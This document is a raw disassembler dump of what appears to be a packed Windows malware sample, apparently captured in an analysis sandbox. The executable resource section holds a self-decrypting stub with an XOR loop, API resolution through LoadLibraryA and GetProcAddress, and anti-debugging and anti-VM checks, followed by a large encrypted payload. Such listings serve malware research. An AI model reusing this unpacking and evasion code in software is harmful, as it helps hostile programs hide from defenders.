dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 dword_406D74 dd 7 dword_406D78 dd 0Ah dword_406D7C dd 8Ch ; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; sub_403496+2�o
dword_406DA0 dd 2 ; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9+1B�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h dword_406E3C dd 82798260h, 21h, 0dword_406E48 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; sub_403CF4+5�r
align 10h
dword_406F30 dd 0F50F513Eh ; sub_401000+10�w ...
dword_406F34 dd 0 ; sub_401210+D�r
; char byte_406F38[]
byte_406F38 db 4 dup(0) ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; sub_402680+91�w
dword_406F40 dd 0 ; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 dd 3 dup(0)
dword_406F58 dd 0A28h dword_406F5C dd 501h dword_406F60 dd 5 dword_406F64 dd 1 dword_406F68 dd 1 dword_406F6C dd 890AD0h dd 0
dword_406F74 dd 890A50h dd 3 dup(0)
off_406F84 dd offset Filename ; DATA XREF: sub_402E58+2E�w
; "C:\\Documents and Settings\\Vernier Image"...
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 dword_406F94 dd 0 ; sub_402B10+8B�w
dword_406F98 dd 0 ; sub_402BC3+46�w ...
; char Filename[]
Filename db 'C:\Documents and Settings\Vernier Image User\Desktop\cc545e1c99ca'
; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
db '94f0d3f9d50b4d18e344.exe',0
align 4
dd 21h dup(0)
dword_40707C dd 9 dup(0) ; .text:00406638�o ...
dword_4070A0 dd 1 ; sub_4030A5+23�w ...
dword_4070A4 dd 0 dword_4070A8 dd 1 ; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; sub_403A40+4�w ...
dword_4070B0 dd 0 ; sub_404573+2E�w ...
dword_4070B4 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 dd 3 dup(0)
dword_4070D4 dd 0 ; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; sub_4046FE+4C�w ...
dword_4070E0 dd 0 dword_4070E4 dd 0 dword_4070E8 dd 10h ; sub_4043C7+5�r ...
dword_4070EC dd 0 ; sub_403D93+259�r ...
dword_4070F0 dd 320650h ; sub_403D93+310�w ...
dword_4070F4 dd 0 ; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; sub_403D68�r ...
; LPVOID lpMem
lpMem dd 320650h ; DATA XREF: sub_403D2A+15�w
; sub_403D68+8�r ...
; UINT CodePage
CodePage dd 4E4h ; DATA XREF: sub_4038A7+14�r
; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; sub_4038A7+171�o ...
dword_40711C dd 0 ; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7+AF�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; LCID Locale
Locale dd 0 ; DATA XREF: sub_4038A7+6E�w
; sub_4038A7+12B�w ...
; HANDLE hHeap
hHeap dd 320000h ; DATA XREF: sub_403382+19�w
; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 890EF0h ; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) ; HGLOBAL hResData
hResData dd 20h ; DATA XREF: sub_4031D7+26�w
; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 dword_407448 dd 1 dword_40744C dd 0 dword_407450 dd 0 ; sub_402B10+57�r
dword_407454 dd 0 dword_407458 dd 1423E8h ; sub_402D47+F�r ...
dd 69h dup(0)
dd 680h dup(?)
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00018000 ( 98304.)
; Section size in file : 00011C00 ( 72704.)
; Offset to raw data for section: 00006A00
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 409000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 4 dup(0)
dd 7C801D77h, 7C80AC28h, 7C809A81h, 7C809B14h, 0
dd 9010h, 0
dd 0FFFFFFFFh, 904Ch, 9010h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 0A2330000h, 0E80E30B5h
dd 0FCF83644h, 0F4476A36h, 9E7F9BDCh, 13B5857Ch, 0EF54DD1Ch
dd 0A18418CFh, 0CA90E8A8h, 3E8CE63Fh, 0A88320ACh, 50000802h
dd 8B600000h, 8B242474h, 247Ch, 245C8B28h, 1B8BFC2Ch, 0DB85C933h
dd 80B21074h, 0DF030000h, 0E803B1A4h, 66h, 0FB3BF673h
dd 7C73h, 33575553h, 0ED3343DBh, 7C8DC38Bh, 0EB8B001Dh
dd 0DF8B0800h, 0F11C49E8h, 3D5C8Dh, 800C703h, 3AE8EF8Bh
dd 5D5FE20Eh, 73C12B5Bh, 8B090000h, 34E8C5h, 1CEB0000h
dd 0AC08E0C1h, 0E840h, 28h, 13DE88Bh, 83000040h, 813DFFD9h
dd 7076000h, 2BF78B56h, 5EA4F3F0h, 4141h, 0D20295EBh, 168A0575h
dd 0C3D21246h, 0E841C933h, 0FFEE0000h, 0C913FFFFh, 0FFFFE7E8h
dd 0C3F272FFh, 107C2Bh, 7C892824h, 0C2611C24h, 0B4480010h
dd 40003085h, 563E03h, 90100060h, 90140000h, 7DF80000h
dd 77F40000h, 7FFDEBF8h, 6600h, 0B8h, 80305488h, 400001Dh
dd 9A330000h, 0F8904000h, 56630000h, 0F2A0000h, 40010000h
dd 501C02h, 4CAB00h, 6109B800h, 3100F61h, 6430056h, 1004h
dd 3CA5h, 80000h, 880105h, 51530000h, 55565752h, 1DE84000h
dd 30ED815Dh, 8D100011h, 25B5h, 8B100011h, 0C083FC46h
dd 8BF02B04h, 468B0856h, 31C0041h, 89088BC2h, 17128F8Dh
dd 0C418520h, 14240C93h, 0C970C06h, 0C100028h, 8BDE0C9Bh
dd 0F6854473h, 0E74h, 2BB9h, 8BF20300h, 0FA03407Bh, 0F38BA4F3h
dd 8D8D0000h, 1000129Fh, 226E851h, 4E8B0000h, 808B2Ch
dd 56032456h, 68406A08h, 6A5197h, 12FF0000h, 128B8589h
dd 0E8561000h, 3D7h, 2041E856h, 0CB0504DFh, 20620502h
dd 85343280h, 89840FC9h, 4E54h, 0E8565108h, 53Eh, 7B74C085h
dd 176F958Bh, 10000000h, 17738D8Bh, 0C9851000h, 8D8D0875h
dd 1367h, 2DEB1000h, 0C1F7h, 1E748000h, 0FFE18152h, 0FFFF0000h
dd 858D517Fh, 10001323h, 3C858D50h, 4000018h, 95FF5010h
dd 8B1D257Dh, 0C8030846h, 414100F8h, 858D5152h, 2B012D1h
dd 8D106A1Eh, 6A15BB85h, 0FF000800h, 1177995h, 13C395FFh
dd 401000h, 800068h, 0FF006A00h, 468BB8B5h, 8B280000h
dd 0C703087Eh, 468B10FFh, 5DC7030Ch, 97C5F5Eh, 0C35B595Ah
dd 205Eh, 100013A2h, 100013BBh, 1088142h, 6D100013h, 56100013h
dd 451B0000h, 7972746Eh, 696F5020h, 4E20746Eh, 746Fh, 756F4620h
dd 5400646Eh, 70206568h, 65636F72h, 7564030Ch, 65206572h
dd 7023h, 20732523h, 6C756F63h, 6F6E2064h, 65622074h, 6C200000h
dd 7461636Fh, 69206465h, 6874206Eh, 2065h, 616E7964h, 2063696Dh
dd 6B6E696Ch, 62696C20h, 617200C0h, 25207972h, 6F512E73h
dd 1DD6472h, 6C616E69h, 1642520h, 615B4300h, 5D796Eh, 1000138Ch
dd 0BD638098h, 65737500h, 33720000h, 6C642E32h, 654D006Ch
dd 67617373h, 4265h, 41786Fh, 72707377h, 66746E69h, 656B0041h
dd 6E720B00h, 45226C65h, 50746978h, 73DD8056h, 0CAF0073h
db 0, 49h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebp
push ebx
push edi
push esi
add [eax-147EA45Bh], al
setalc
adc eax, [eax]
adc [ebx+0E8B0875h], cl ; CODE XREF: .rsrc:0040946D�j
add eax, [eax-0AE34F8h]
xchg eax, ebx
xchg eax, ebp
test eax, eax
jz short loc_409471
mov [eax], esp
add [ebp-4], eax
mov edx, [esi+4] ; CODE XREF: .rsrc:00409441�j
add edx, ebx
jle short near ptr loc_40943C+2
mov eax, [edx] ; CODE XREF: .rsrc:00409462�j
test [edx], eax
add al, al
jz short loc_409465
push edx
mov eax, [edx]
add eax, ebx
push eax
push dword ptr [ebp-4]
call dword ptr [ebx-7A51E000h]
sal byte ptr [esp+edx-55h], 5Ah
add edx, 4
jmp short near ptr loc_409443+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_409465: ; CODE XREF: .rsrc:00409449�j
add [ebx+68B0CC6h], al
test eax, eax
jnz short near ptr loc_409425+5
xor eax, eax
loc_409471: ; CODE XREF: .rsrc:00409435�j
jmp short near ptr dword_409478
; ---------------------------------------------------------------------------
db 0B8h
dd 56FFFFh
dword_409478 dd 5F5EFFFFh, 0C2C95D5Bh, 6E000004h, 8B087D8Bh, 5F8B0447h
; CODE XREF: .rsrc:loc_409471�j
dd 74C33B08h, 8B44h, 0F6853877h, 0F3033D74h, 0D82BD38Bh
dd 0ADFC5D89h, 0D88B0000h, 85ADDA03h, 8B2A74C0h, 8E983C8h
dd 0C985h, 0AD66ED74h, 0E781F88Bh, 0FFFh, 0C166FB03h, 0CE80000h
dd 3F88366h, 458B0575h, 490701FCh, 15887549h, 62CCEBE1h
dd 555F0600h, 0D2085D8Bh, 0A9ED815Dh, 8890014h, 3C4E8B10h
dd 8004AADBh, 83085667h, 0B70F48C3h, 18A90C43h, 1075E4C1h
dd 6F75D0A9h, 0FFA94601h, 7EEB6875h, 338B51h, 53085418h
dd 0EB8BC933h, 0E5BB70Fh, 0CF3B0000h, 68B4D7Dh, 1275FF3Ch
dd 7425FC80h, 8005h, 87515FCh, 8306C683h, 0E4EB06C1h, 0E74E83Ch
dd 0E93C0000h, 468B2975h, 0F8385701h, 8EB1875h, 8B57h
dd 0D8380146h, 0C1660E75h, 0C0C108E8h, 2BC48610h, 89C10000h
dd 835F0146h, 0C18305C6h, 46B3EB05h, 0EB41h, 0EB595BAFh
dd 8B575118h, 0FFA033Bh, 830E4BB7h, 2EC0000h, 57525166h
dd 16E8h, 83595F00h, 5610C3h, 0E9057449h, 0FFFFFF5Ch, 0D400045Dh
dd 8758B60h, 104D8B66h, 20C558Bh, 3071980h, 88966C2h, 0C961F4EBh
dd 1E2B0CC2h, 800800E6h, 100015FFh, 1591858Dh, 0D0C2D21Bh
dd 0A78B0889h, 48896105h, 22CC1604h, 16011649h, 2000A90Ch
dd 0E9407525h, 0A4h, 3F28B51h, 8B331980h, 84B84BDh, 0F9C1C18Bh
dd 0F3020014h, 83C803A5h, 0A4F303E1h, 9B60FC8Bh, 47B03FAh
dd 591B00F7h, 8B5D69EBh, 4087Dh, 163403h, 0F78B5110h, 8B30772Bh
dd 0C600A8FEh, 0C703574Ah, 10015256h, 0A68D8D5Ch, 84B8B51h
dd 8D8D89h, 5105B60Ch, 0D0FF5657h, 50A18B5Ah, 0E6E63C8h
dd 5F5E6678h, 4ED7B1EBh, 0B2383A38h, 16B70DC8h, 740D1500h
dd 0E083F259h, 5007402h, 738B514Ah, 4B8B8604h, 74000308h
dd 7B8B62F2h, 8BFA0304h, 84B02C3h, 0AAF3C033h, 1D083B82h
dd 17002610h, 7FADE285h, 0C758B56h, 5D8B0002h, 39C03308h
dd 4751046h, 2C740639h, 741C3000h, 8430303h, 30C4E8Bh
dd 84Bh, 85107E8Bh, 30374FFh, 5750087Bh, 19E85351h, 0
dd 0FFF88300h, 0C6830774h, 33C9EB14h, 22505EC0h, 0A6C2C9h
dd 5340A315h, 0AF193855h, 0C459986h, 83892704h, 89C033A2h
dd 0A4E66083h, 75FFB88Bh, 11FF0Ch, 0FC4589D2h, 7F74C085h
dd 10758Bh, 14557280h, 275D285h, 0F685D68Bh, 0F28B0275h
dd 0CA43E00Ch, 0C7100017h, 10384331h, 0B85249DEh, 0E1A94941h
dd 13808B0Ah, 0E2E28112h, 5D8B0BEBh, 1808B08h, 8530312h
dd 3E02C283h, 18092D58h, 10001311h, 900752h, 0C0855400h
dd 895A1174h, 83028906h, 0C68304C2h, 0EB0400B6h, 0EBC0339Bh
dd 63F5A06h, 0C95B5D05h, 0EF0063C2h, 748B6000h, 7C8B2424h
dd 5C8B2824h, 8BFC2C24h, 74DB851Bh, 3D2334Eh, 0FB3BA4DFh
dd 20E84573h, 73000000h, 27E8F4h, 0E8910000h, 21h, 41414848h
dd 0AC08E0C1h, 0F78B5640h, 0A4F3F02Bh, 66D7EB5Eh, 875D203h
dd 92AD6692h, 42D20366h, 40C033C3h, 0FFFFEAE8h, 0E8C013FFh
dd 0FFFFFFE3h, 2BC3F272h, 8928247Ch, 611C247Ch, 0C50010C2h
dd 5B000090h, 44000009h, 85000001h, 18000097h, 1C000090h
dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 40283E00h, 3F1h dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 39DDh dup(0)
; ---------------------------------------------------------------------------
cld
call loc_41903E
; =============== S U B R O U T I N E =======================================
sub_419016 proc near ; CODE XREF: .rsrc:0041908D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41901E: ; CODE XREF: sub_419016+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41901E
pop ebx
retn
sub_419016 endp
; ---------------------------------------------------------------------------
db 6Eh, 57h
; ---------------------------------------------------------------------------
loc_41902F: ; CODE XREF: .rsrc:00419078�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419031: ; CODE XREF: .rsrc:00419046�j
; .rsrc:00419057�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_419065
; =============== S U B R O U T I N E =======================================
sub_41903B proc near ; CODE XREF: .rsrc:0041905A�p
; .rsrc:00419060�p
rdtsc
retn
sub_41903B endp
; ---------------------------------------------------------------------------
loc_41903E: ; CODE XREF: .rsrc:00419011�p
test eax, eax
jnz short loc_41904A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_419031
jmp short loc_419059
; ---------------------------------------------------------------------------
loc_41904A: ; CODE XREF: .rsrc:00419040�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_419031
loc_419059: ; CODE XREF: .rsrc:00419048�j
push ebp
call sub_41903B
xchg eax, ecx
call sub_41903B
loc_419065: ; CODE XREF: .rsrc:00419039�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 167D8h
sub eax, 100h
jnb short loc_41902F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_419016
test [edi+4Eh], edx
cdq
pop ss
adc eax, 12F8690Ah
scasd
scasd
fsub dword ptr [esi]
db 2Eh
pop ebx
ficomp word ptr [eax]
rcr byte ptr [edx-5Eh], cl
xor dh, [eax-68ECF160h]
in eax, dx
xchg eax, edi
and dword ptr [eax+7DFA8278h], 0FCC345E5h
scasb
scasd
jl short loc_419119
sub ch, dl
and ah, ch
rcl bl, 9Bh
add [esp+esi+39h], ah
scasd
mov eax, 0C862C132h
push ss
mov ah, 0A9h
test al, 3Ah
test [edi], dl
cmp [eax], eax
add ah, al
imul ebp, [edx], 0E6A4FF24h
icebp
fld tbyte ptr [ecx-6Bh]
ror dl, 0B8h
xchg eax, ebp
; ---------------------------------------------------------------------------
db 0Fh
dd 4E66F51Eh, 604EFABCh, 0AD83E3CEh, 0F1C43A02h, 907F0E7Eh
dd 0A0972C82h, 0DF2D4D12h, 0B4C1B65Dh, 0BD12422h, 5A238882h
dd 6B79D8E8h, 99E13207h
db 0C7h
; ---------------------------------------------------------------------------
loc_419119: ; CODE XREF: .rsrc:004190BB�j
out dx, eax
or ch, cs:0CF2B555Ch[edx*8] ; CODE XREF: .rsrc:00419140�j
; .rsrc:0041912D�j
xor [ebx], ebx
mov ebx, ecx
call far ptr 7DC4h:0F42B3D8Fh
jo short near ptr loc_41911A+3
psubusb mm1, qword ptr [edx+1B17E6B8h]
rcr ebp, 54h
cmp bl, fs:[ecx+5982A2Dh]
db 2Eh
loopne near ptr loc_41911A+2
scasb
dec edx
dec ebx
fstp qword ptr [ebp+eax*4-14h]
xor bh, dl
; ---------------------------------------------------------------------------
dd 56283F0Fh, 5893800Bh, 84BBCAC9h, 0E6CD9AF7h, 0D766D654h
dd 70892B0Ch, 23CE455Dh, 0AB13A594h, 0D3A4EEACh, 0F9E311Fh
dd 7C4F2F41h, 0A19C36BAh, 0E4EEB095h, 7509CB8Ch, 0D07A3C21h
dd 233939EBh, 6D5B9695h, 82DF6DE6h, 6DE52320h, 0A8AAE78Fh
dd 32A80B6h, 0DA9FC67Eh, 9894BAC8h, 0D6E3FCCBh, 191FD4F3h
dd 7B77816Ch, 0A38A597Eh, 4515ED11h, 0EF45E7FAh, 70058374h
dd 0B9D062B6h, 14826FACh, 2C98EEACh, 220A2B2h, 0E404F2F1h
dd 0C0C33D0Dh, 33710362h, 6EA337C7h, 61FBBDA1h, 0EE455C92h
dd 0F9871914h, 244C6B51h, 159AA392h, 0BFDF7CD1h, 8470AE2Dh
dd 0C762C4E2h, 2036442Dh, 2A498D7Eh, 0BA5EC7A1h, 5712F683h
dd 0A8640FFEh, 0DB183B06h, 3B63A959h, 65D9A9E2h, 6C4FA21Dh
dd 18A9C1h, 2748906Fh, 8A3051Fh, 91EDDA3Dh, 15D53BB0h
dd 0B6658485h, 0C9B9204Ah, 0E67E140Fh, 2D43D5BCh, 139D659Ah
dd 32CE504Bh, 0A71029E5h, 2859EBE8h, 876E0B0h, 0A7E37176h
dd 9E41FA3Bh, 76E6B57h, 1C34C7ADh, 36C748Bh, 0CFBF617Bh
dd 6C84171Fh, 19AB4925h, 0FDE7A190h, 54D56766h, 829B2F81h
dd 0AB39F29Ah, 0F12FDDBCh, 0E3C615E9h, 5B41A941h, 7173B585h
dd 2C3BCDFBh, 0E9021F15h, 0AEC0B057h, 27C21E1Ch, 391DAFA5h
dd 0D30B3D58h, 71516E5Dh, 8992238Ch, 0F2EA30C4h, 151C92C4h
dd 32628E32h, 9FB74B8Ch, 48D4B28Eh, 2542D4E2h, 0F005C01Ch
dd 0C848D45Eh, 8593150Fh, 0C5D7EB98h, 62D8497h, 0E0DBC9F5h
dd 6F573A09h, 0D162FFFEh, 1C32C6FEh, 0CD660C01h, 0D6424F7Fh
dd 0ED069A15h, 0B048EAF2h, 0C7261922h, 0BC2C9A65h, 9A1E242Ah
dd 0CC5EF0EDh, 3D0F3430h, 0D398857Bh, 0BC23C5CFh, 0E1F50635h
dd 2209E047h, 0E7FE6F6Fh, 0AD38D15Ah, 0FC011C1Ah, 377FCD5Ah
dd 8CEBBF46h, 585FE36Ah, 6A0021Bh, 7D4E6D48h, 13D543BBh
dd 3688E81h, 75B54747h, 627B0CEDh, 4BF6F5Dh, 218E97A6h
dd 6A3D5D36h, 0FB9553DEh, 7E3CEB07h, 6E4C54AFh, 44F81872h
dd 0BEB3AF82h, 547744FCh, 1EBDC2C2h, 200A79C5h, 29102BB2h
dd 69815E16h, 8420D8D7h, 5E0FDA10h, 0DC7D8751h, 0F46CCB83h
dd 2D5C8439h, 0B21D3E7h, 0D08CB4F2h, 95C6FAB5h, 5A72046Bh
dd 7177A3C0h, 0B5F2E4DCh, 864BC1ACh, 0ECD01A28h, 61259F19h
dd 7012A4C3h, 4BD800BDh, 0EF9A5AE2h, 19619FF3h, 4540BAD3h
dd 0BCED7F1Fh, 64D91444h, 0EDECF459h, 793EE0E2h, 0E3FC10CDh
dd 0B1C866DEh, 763AAC1Fh, 8554D6F4h, 219A3BFh, 622D9FFBh
dd 9CA4DBB4h, 0D7E4FBCAh, 181ED4C6h, 487E6579h, 0A2895219h
dd 26EAEE42h, 0C544E6F9h, 0F3099B8Dh, 0D3A00E2Dh, 0FC55753h
dd 2F339A82h, 5F7AD6D4h, 0AB911A16h, 6CFA3C7Dh, 685BDB94h
dd 0C3B04EC6h, 0B3FABCA7h, 0C2E03805h, 0F813E7E9h, 0B64BEDF7h
dd 0C665FD61h, 0E8D402F1h, 0E948A57Ah, 5889A1F0h, 5C26B8B7h
dd 0B68E3918h, 0EBE12437h, 321E7F6Eh, 2459A9A9h, 37946CC4h
dd 24C76973h, 22DB49D9h, 0C505B2B2h, 303BD03Dh, 0D518ED6Eh
dd 4737CB64h, 3A67C9D3h, 0E92ED4BEh, 0EBDD8611h, 0A19FF049h
dd 4EEA0F0Eh, 0F4E5D32h, 64F8CECDh, 0B6FD730Eh, 0DE10D317h
dd 4168C604h, 0F84AFBAFh, 0FCCE21E0h, 0E568BF3Ah, 0A9EEB9A3h
dd 0E2DCB6C1h, 88FFADFFh, 58972550h, 5CAF5880h, 46885FDAh
dd 0DE50C7Ch, 8ED36562h, 0B27ABAE2h, 64B375C9h, 2656B586h
dd 0C308BBFDh, 0CCFE4041h, 0D255056h, 0B6C6989Bh, 0E8CEBB6Ch
dd 0D99D96D3h, 56FEE314h, 0D5CA6EE8h, 1614968Ah, 3C259100h
dd 4535CD62h, 0A565C7DDh, 3CEE3D24h, 8EEF8183h, 0B578D2B8h
dd 0F6840D3Ch, 2970F91Ch, 10FF797Eh, 0B4CB5DA2h, 4ACB2322h
dd 6E07B92Eh, 51AC5FCh, 0E6B7277h, 83CC6869h, 96393976h
dd 4F46A795h, 1F156F89h, 3036B2B1h, 6AB1065Fh, 6017898Ah
dd 0DDDA0861h, 7F526354h, 7F1CEA09h, 4604B6B6h, 0C2193E0h
dd 0D1E668D8h, 96AC3E3Eh, 5B720404h, 2137C9C9h, 19AFD8DEh
dd 9BE98DC1h, 0DCD1B119h, 0CD381F5Ah, 0A0D14A46h, 0A4AB0B28h
dd 0E3F35161h, 2601BA90h, 615CD9DFh, 0B4882CDCh, 0EEDA1331h
dd 0D797E7Eh, 444CA4BCh, 8103E1F4h, 0DEBB2F28h, 348F4F45h
dd 49358397h, 6F70EDCEh, 8BDE3114h, 0F9C55344h, 3F00BD9Eh
dd 694F8DA4h, 0B99DECF7h, 0D1FA4B0Dh, 0D0B7074h, 4D2BA486h
dd 0B57AE8F9h, 0DCBD2262h, 2CF05346h, 30358189h, 7877E5D7h
dd 0CF80171Dh, 0F5CF4E7Eh, 31246776h, 7B54A2B5h, 8188CF8Dh
dd 0FDA52633h, 6EA7778h, 73BB1B9h, 9B7EF190h, 0D0BE1B18h
dd 0FCD92E59h, 2235879Bh, 7447DDCAh, 0A18E3A7Eh, 0FFDD2A05h
dd 2D037D49h, 5149ACA4h, 0EB40E0F6h, 0F6B33C1Eh, 26E87377h
dd 3B379E8Ah, 4763CCEEh, 92B90206h, 8BC7595Dh, 1C139CBEh
dd 7B59DAD0h, 0B098C5E0h, 0CCD6072Fh, 217D4E6Ah, 430FA0B1h
dd 976BECFEh, 0D3A33E28h, 7CD24049h, 112C8FADh, 6D69DCC9h
dd 0BF8B301Bh, 0FDDC595Eh, 572F7972h, 4947A082h, 0A488E7EEh
dd 0E9DB3C39h, 2DE17B74h, 462C9CDAh, 8863C5F4h, 0D5A00736h
dd 0E7DD2C6Ah, 3A3AA784h, 604BDFC5h, 0A78C3C7Ch, 0EBDD2417h
dd 181B686Fh, 643A8DB3h, 87A9E5F4h, 0C8A8223Ah, 1DED7352h
dd 4C318F92h, 0BF7BC8CFh, 0B7BE2A6Ch, 0ECCF5A66h, 0A158F99h
dd 774ECFD5h, 0A082EDF6h, 0F1DA0F47h, 22106F6Eh, 4A2EBFBDh
dd 8E69D497h, 0D6A51239h, 0E04550h, 5E1AE9A6h, 6075F8DDh
dd 8C873C04h, 8FC25551h, 3B098EB2h, 7E5DAA85h, 9086E9C4h
dd 0E4DB2027h, 0FF25B13h, 5F3589B6h, 857FFBFDh, 0D4A03464h
dd 0F3EB4F4Ah, 2F1BDDDDh, 0C56C7C6h, 0B2880B2Ah, 0A5DE4C5Ah
dd 23164B36h, 446ACABDh, 8FBBEBEEh, 0F8C33038h, 19CF6F7Ch
dd 420F85B2h, 9E7AD7D0h, 0B2BC1F1Fh, 0E3CC316Eh, 200DB080h
dd 7B46EBDFh, 0A58BF4EEh, 0E8D11545h, 416654Ch, 4252B89Bh
dd 8868C595h, 0E7CA2C3Eh, 7F14F4Eh, 4A308EB3h, 6A5CCAE4h
dd 9EDF141Dh, 0F8D1455Fh, 3F2B909Ah, 194CAEADh, 0AA9DF4D0h
dd 0CFD30A29h, 1CCE1274h, 5B2FB397h, 865AE8EFh, 0D5B9140Bh
dd 0DF34F42h, 213082B8h, 7E6EB2DCh, 0AE80053Bh, 0FDED5849h
dd 1771666Eh, 7A448BB3h, 0B49EF9ECh, 0CCA23C20h, 20876A64h
dd 513E9DA8h, 0AA74D7C3h, 0DAB4061Ah, 0FCD85C5Eh, 916BAF2h
dd 6446DCCAh, 0B6892D1Bh, 0F4DD2D37h, 120C4408h, 4C6BBFACh
